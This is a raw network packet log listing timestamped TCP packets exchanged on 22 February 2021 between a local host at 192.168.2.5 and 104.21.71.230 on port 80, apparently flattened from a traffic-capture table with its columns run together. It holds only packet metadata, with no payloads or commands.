                                                                                                                                                                Feb 22, 2021 07:46:11.914789915 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914808035 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914809942 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.914824963 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914834976 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.914844990 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.914870024 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.915745974 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.915774107 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.915790081 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.915832996 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.915874004 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.916167974 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.916201115 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.916220903 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.916238070 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.916249990 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.916254044 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.916274071 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.916284084 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.916311026 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.917099953 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917181015 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917216063 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917229891 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917238951 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.917272091 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.917526007 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917545080 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917566061 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917583942 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917599916 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917610884 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.917617083 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.917644978 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.917665005 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.918519974 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.918545008 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.918557882 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.918575048 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.918592930 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.918601036 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.918658972 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.919230938 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.919258118 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.919275045 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.919291019 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.919306993 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.919318914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.919338942 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.919378042 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.920013905 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.920037031 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.920053959 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.920073032 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.920090914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.920106888 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.920114994 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.920137882 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.920994997 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921021938 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921041012 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921056986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921070099 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921092987 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.921142101 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.921653986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921674013 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921689987 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921725035 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921744108 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921765089 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.921766996 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.921802998 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.921852112 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.922631025 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.922655106 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.922682047 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.922697067 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:11.922700882 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.922714949 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:11.922771931 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.228271008 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.228300095 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.228315115 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.228373051 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.546474934 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546515942 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546534061 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546550035 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546567917 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546583891 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546629906 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.546665907 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.546849012 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546874046 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546894073 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546910048 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546921968 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.546926022 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546942949 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.546956062 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.546979904 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.547808886 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.547837973 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.547854900 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.547871113 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.547888041 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.547904015 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.547930002 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.547969103 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.548783064 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.548810005 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.548826933 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.548841953 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.548861980 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.548865080 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.548880100 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.548902988 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.548935890 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.549699068 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.549735069 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.549752951 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.549768925 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.549787998 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.549807072 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.549839973 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.549865007 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.550640106 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.550683022 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.550700903 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.550717115 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.550733089 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.550750017 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.550765991 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.550797939 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.551600933 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.551639080 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.551659107 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.551672935 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.551685095 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.551698923 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.551999092 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.552531004 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.552556038 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.552573919 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.552589893 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.552598000 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.552607059 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.552627087 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.552669048 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.552757978 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.553469896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.553495884 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.553517103 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.553535938 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.553551912 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.553569078 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.553590059 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.553626060 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.554416895 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.554445028 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.554462910 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.554482937 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.554501057 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.554508924 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.554517031 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.554543018 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.554568052 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.555367947 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.555391073 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.555408001 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.555424929 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.555442095 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.555458069 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.555465937 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.555511951 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.556293011 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.556318998 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.556337118 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.556355000 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.556371927 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.556380987 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.556390047 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.556412935 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.556437969 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.557260036 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.557291031 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.557310104 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.557327032 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.557348967 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.557353020 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.557363987 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.557410955 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.557423115 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.558072090 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.558094978 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.558115959 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.558134079 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.558150053 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.558166981 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.558170080 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.558204889 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.559026003 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.559051991 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.559067965 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.559088945 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.559108019 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.559123993 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.559138060 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.559189081 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.559961081 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.559984922 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.560000896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.560017109 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.560036898 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.560048103 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.560055017 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.560076952 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.560110092 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.563536882 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.566854954 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.566907883 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.566921949 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.566935062 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.566952944 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.566970110 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.567015886 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.567044973 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.567214966 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.567239046 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.567255974 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.567272902 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.567290068 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.567293882 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.567312956 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.567323923 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.567358017 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.568188906 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.568223000 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.568242073 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.568259001 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.568275928 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.568289995 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.568291903 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.568336010 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.577496052 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577534914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577553988 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577573061 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577586889 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577632904 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.577665091 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.577790976 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577810049 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577830076 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577847004 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.577847958 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577866077 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577874899 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.577883005 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.577917099 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.578759909 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.578788042 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.578804970 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.578821898 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.578838110 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.578847885 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.578854084 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.578905106 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.579680920 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.579709053 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.579725981 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.579742908 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.579761982 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.579761982 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.579780102 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.579791069 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.579832077 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.580605030 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.580631018 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.580648899 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.580666065 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.580683947 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.580692053 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.580703974 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.580719948 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.581536055 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.581561089 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.581577063 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.581595898 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.581614017 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.581619978 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.581629992 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.581666946 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.582479954 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.582509995 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.582528114 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.582542896 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.582545042 CET8049726104.21.71.230192.168.2.5
